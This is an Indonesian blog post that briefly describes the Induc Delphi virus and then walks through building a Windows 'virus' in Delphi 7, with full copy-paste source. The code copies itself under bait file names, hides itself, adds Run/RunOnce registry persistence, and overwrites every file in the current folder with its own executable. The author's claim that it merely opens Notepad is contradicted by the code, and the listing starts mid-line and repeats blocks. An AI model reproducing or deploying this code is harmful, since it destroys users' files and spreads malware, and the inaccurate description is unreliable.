Virus Delphi: rus.Win32.Induc.a mengambil keuntungan dari mekanisme dua langkah yang digunakan di lingkungan Delphi untuk membuat file executable.

Baca juga:

cara kerja virus trojan

Backdor / pintu belakang web

Kode sumber pertama dikompilasi untuk menghasilkan berkasu

dcu (Delphi compiled unit) menengah, yang kemudian dihubungkan untuk membuat file executable Windows.

Virus delphi baru diaktifkan saat aplikasi yang terinfeksi diluncurkan.

Kemudian memeriksa apakah lingkungan pengembangan Delphi versi 4.0, 5.0, 6.0 atau 7.0 telah terinstal di komputer.

Jika perangkat lunak terdeteksi, Virus.

Win32.Induc.a mengkompilasi file sumber Delphi Sysconst.pas, menghasilkan versi modifikasi dari file Sysconst.

dcu yang dikompilasi.

Praktis semua proyek Delphi mencakup string “gunakan SysConst”, yang berarti infeksi hanya satu modul sistem menghasilkan infeksi semua aplikasi yang sedang dikembangkan.

Evek Virus delphi:

Dengan kata lain, SysConst yang dimodifikasi.

File dcu menyebabkan semua program berikutnya dibuat di lingkungan yang terinfeksi untuk mengandung kode virus delphi baru.

File pas yang dimodifikasi tidak lagi diperlukan dan akan dihapus.

Virus saat ini tidak menjadi ancaman – tidak ada perilaku destruktif selain infeksi.

Hal ini sangat mungkin dimaksudkan untuk demonstrasi dan pengujian rutinitas infeksi baru.

Tidak adanya payload yang merusak, infeksi beberapa versi dari klien pesan instan populer QIP dan praktik penerbitan yang biasa.
File dcu oleh pengembang telah menyebabkan Virus.Win32.Induc.a menyebar ke seluruh dunia. Kemungkinan besar di masa depan akan dijemput dan di-tweak oleh penjahat dunia maya agar lebih merusak. Solusi Lab Kaspersky berhasil mendeteksi Virus.Win32.Induc.a dan memperlakukan file Delphi terkompilasi dan executable Windows.

Virus delphi ini sangat mudah di buat.

Membuat Kode Program virus

Kode program dibuat di events komponen yang terletak di kotak “Objek Inspector”.

ARTIKEL LAINYA:  Jenis Hacker dan Beberapa Hacker Terkenal di Dunia

Berikut ini gambar events komponen:

Virus delphi

Klik komponen FORM yang ada di “Object TreeView”

kemudian klik “Events” yang ada di “Objek Inspector”,

cari event “OnShow” kemudian double klik kotak kosong disampingnya seperti tampak pada gambar di bawah ini:

Virus delphin

Setelah kotak disamping event “OnShow” di double klik

maka editor delphi akan langsung membuat prosedur untuk event OnShow.

Tugas kita hanyalah mengisi kode yang diapit oleh keyword BEGIN dan END.

Kode yang kita ketikan di event OnShow akan dijalankan pada saat
form muncul.

Berikut ini gambar penulisan kodennya:

Virus delphi

Selanjutnya cari event “OnPaint” kemudian double klik disebelah kanannya,

sama seperti pada event “OnShow” maka editor delphi akan langsung membuat prosedur untuk event OnPain.

Ketikan kode diantara BEGIN dan END seperti tampak pada gambar berikut ini :

Virus delphi

Kode event untuk FORM sudah selesai sekarang tinggal membuat kode event TIMER.

Sebelum kode event TIMER dibuat, terlebih dahulu harus membuat prosedur-prosedur seperti flowchart di atas yaitu prosedur untuk mengkloning virus dan membuat startup,

prosedur untuk modifikasi konfigurasi sistem dan prosedur untuk melakukan operasi “attack & defense”.

Berikut ini cara pembuatan prosedur beserta implementasinya :

Virus delphi

Prosedur yang sudah dideklarasikan harus diimplementasikan.

Berikut ini implementasi prosedur kloning_dan_startup :

Virus delphi

Berikutnya implementasi prosedur modifikasi konfigurasi sistem yang diletakan dibawah implementasi prosedur kloning_dan_startup:

Virus delphi

Terakhir adalah implementasi prosedur operasi_attack_defense yang diletakan dibawah implementasi prosedur modifikasi_konfigurasi_sistem:

Virus delphi

Pengkodean sudah selesai, sekarang pilih menu PROJECT  BUILD ALL PROJECTS,

delphi akan membuat program Viruz secara otomatis yang diletakan di folder project (AWAS : jangan dibuka ! ! !).

Jika ada pesan error atau kesalahan coba cek lagi pengkodean anda. Untuk menjalankan Viruz pilih menu RUN  RUN atau tekan tombol F9 dan jreng… apa yang terjadi?

ARTIKEL LAINYA:  Cara Hack Menggunakan Alamat IP Komputer

Untuk menghentikan program pilih menu RUN PROGRAM RESET atau tekan kombinasi tombol CTRL+F2.

PERHATIAN :

jangan menjalankan Viruz diluar Delphi karena jika berjalan di luar Delphi, Viruz tidak bisa di-reset, resiko ditanggung sendiri.

Program Viruz yang kita buat akan mengeksekusi program Notepad milik Windows sebanyak lima kali setiap 1 menit.

Kode untuk mengeksekusi notepad terdapat dibawah komentar.

Berikut adalah kode virus Delphi.

kode untuk membuat virus dengan Delphi 7, ketik kode di bawah ini atau bisa kopi paste.

Dan ingat kode di bawah hanya untuk pembelajaran saja, dan kami tidak bertanggung jawab penyalah gunaan kode di bawah ini:

eName),PChar(windir+’\Jangan dibuka.exe’),true);


CopyFile(pchar(application.ExeName),PChar(windir+’\hotmovie.exe’),true); 

CopyFile(pchar(application.ExeName),PChar(windir+’\ramdan.avi.exe’),true);

CopyFile(pchar(application.ExeName),PChar(sysdir+’\runfold\-NET-SERVICES-.exe’),true);

except end;

end;

{+++++++++++++++++++++++++++++++++++} 

{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%} 

{menjalankan service tak terlihat}
 

begin

getsystemdirectory(sysdir,sizeof(sysdir));

try

SetFileAttributes(PChar(sysdir+’\runfold\-NET-SERVICES-.exe’), FILE_ATTRIBUTE_HIDDEN);

except end;

end;

{+++++++++++++++++++++++++++++++++++} 

{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%} 

{men-disable TASK MANAGER}

try

regis := TRegistry.Create;

regis.RootKey := HKEY_CURRENT_USER;

regis.OpenKey(’Software’, True);

regis.OpenKey(’Microsoft’, True);

regis.OpenKey(’Windows’, True);

regis.OpenKey(’CurrentVersion’, True);

regis.OpenKey(’Policies’, True);

regis.OpenKey(’System’, True);

regis.WriteString(’DisableTaskMgr’, ‘0′);

regis.CloseKey;

except

end;

{+++++++++++++++++++++++++++++++++++} 

{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%} 

{membuat key di registry biar auto run gitu}

begin

try

getsystemdirectory(sysdir,sizeof(sysdir));

reg1 := TRegistry.Create;

reg1.RootKey := HKEY_LOCAL_MACHINE; if

reg1.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Run’,True) then

reg1.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);

reg1.CloseKey; {membuat key registry di runonce} 

reg2 := TRegistry.Create;

reg2.RootKey := HKEY_LOCAL_MACHINE; if

reg2.OpenKey(’Software\Microsoft\Windows\CurrentVersion\RunOnce’,True) then

 reg2.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);

reg2.CloseKey; except end; end;

{+++++++++++++++++++++++++++++++++++}

{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}

{menginfeksi file}

begin
 try

dir := GetCurrentDir;

APath:=

dir; FindFirst(APath+’\*.*’, faAnyFile, MySearch);

refresh;

while

FindNext(MySearch)=0 do

begin

copyFile(pchar(application.ExeName),

pchar(APath+’\’+MySearch.Name),false);

refresh;

end;

FindClose(MySearch);

except

end;

end;

refresh;

{+++++++++++++++++++++++++++++++++++}

{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}

{merubah file yg terinfeksi}

begin

try

dir := GetCurrentDir;

APath:= dir; 

FindFirst(APath+’\*.*’, faAnyFile, MySearch); 

refresh;

 while FindNext(MySearch)=0 do

 begin 

renamefile (pchar(APath+’\’+MySearch.Name),

pchar(APath+’\’+MySearch.Name+’.exe’)); 

renamefile(pchar(application.ExeName+’.exe’),

pchar(application.ExeName));

 refresh; 

end;

 FindClose(MySearch); 

except end; 

end;

 refresh;

 end; 

{+++++++++++++++++++++++++++++++++++} 

{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%} 

procedure TForm1.

Timer1

Timer(Sender: TObject); 

{terus perhatiin yah}

 {deklarasi variabel}

 var regis: 

TRegistry; 

reg1:

TRegistry;

 reg2:

TRegistry; 

windir:array[0..255] of char; sysdir:array[0..255] of char; 

{+++++++++++++++++++++++++++++++++++} 

{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%} 

begin

 begin

 getwindowsdirectory(windir,sizeof(windir)); 

getsystemdirectory(sysdir,sizeof(sysdir)); 

try mkdir(sysdir+’\runfold’); 

except 

end; 

try 

CopyFile(pchar(application.ExeName),

PChar(windir+’\Dadan cakep.exe’),true); 

CopyFile(pchar(application.ExeName),

PChar(windir+’\sistim32.exe’),true); 

CopyFile(pchar(application.ExeName),

PChar(windir+’\Rahasia.exe’),true); 

CopyFile(pchar(application.ExeName),

PChar(windir+’\Jangan dibuka.exe’),true); 

CopyFile(pchar(application.ExeName),

PChar(windir+’\hotmovie.exe’),true); 

CopyFile(pchar(application.ExeName),

PChar(windir+’\ramdan.avi.exe’),true); 

CopyFile(pchar(application.ExeName),

PChar(sysdir+’\runfold\-NET-SERVICES-.exe’),true);

 except end;

 end; 

{+++++++++++++++++++++++++++++++++++} 

{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%} 

{tetep jalanin virus secara tak terlihat} 

begin 

getsystemdirectory(sysdir,sizeof(sysdir)); 

try 

SetFileAttributes(PChar(sysdir+’\runfold\-NET-SERVICES-.exe’), FILE_ATTRIBUTE_HIDDEN);

 except end;

 end; 

{+++++++++++++++++++++++++++++++++++} 

{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%} 

{mendisable task manager}

 begin

 try

 regis :=

 TRegistry.

Create; 

regis.RootKey := HKEY_CURRENT_USER;

 regis.OpenKey(’Software’, True); 

regis.OpenKey(’Microsoft’, True); 

regis.OpenKey(’Windows’, True); 

regis.OpenKey(’CurrentVersion’, True); 

regis.OpenKey(’Policies’, True); 

regis.OpenKey(’System’, True);

 regis.WriteString(’DisableTaskMgr’, ‘0′); 

regis.CloseKey; except end; end; 

{+++++++++++++++++++++++++++++++++++} 

{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%} 

begin

 try

 getsystemdirectory(sysdir,sizeof(sysdir));

 reg1 := TRegistry.

Create; 

reg1.RootKey := HKEY_LOCAL_MACHINE; if 

reg1.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Run’,True) then

 reg1.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’); 

reg1.CloseKey; {bikin lagi key registry} reg2 := TRegistry.Create; 

reg2.RootKey := HKEY_LOCAL_MACHINE; if 

reg2.OpenKey(’Software\Microsoft\Windows\CurrentVersion\RunOnce’,T

rue) then reg2.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’); 

reg2.CloseKey; except end; end; 

{+++++++++++++++++++++++++++++++++++} 

{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%} 

try

 ShellExecute(0, ‘open’, ‘www.imm.or.id’, nil, nil, SW_NORMAL); 

mciSendString(’you sweet’, nil, 0, handle); 

except 

end; 

timer2.

Enabled:= true;

 timer1.

Enabled:= false; 

end; 

procedure 

TForm1.

Timer2

Timer(Sender: TObject); 

begin

 try

 mciSendString(’ You are smart ’, nil, 0, handle); 

except
 end;

 timer1.

Enabled:= true; 

timer2.

Enabled:= false; 

{+++++++++++++++++++++++++++++++++++} 

{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%} 

{+++++++++++++++++++++++++++++++++++} 

{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%} end; 

end.

Dan ingat kode di ini hanya untuk pembelajaran saja, dan kami tidak bertanggung jawab penyalah gunaan kode ini:

ARTIKEL LAINYA:  Footprinting dalam Etichal Hacking Tutorial

 

uzie......borot

Saya ini blogger paruh waktu asal Cilacap. Pekerjaan utama saya saat ini hanyalah tukang pijit di salah satu mall di Bogor.

uzie......borot

Saya ini blogger paruh waktu asal Cilacap. Pekerjaan utama saya saat ini hanyalah tukang pijit di salah satu mall di Bogor.

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *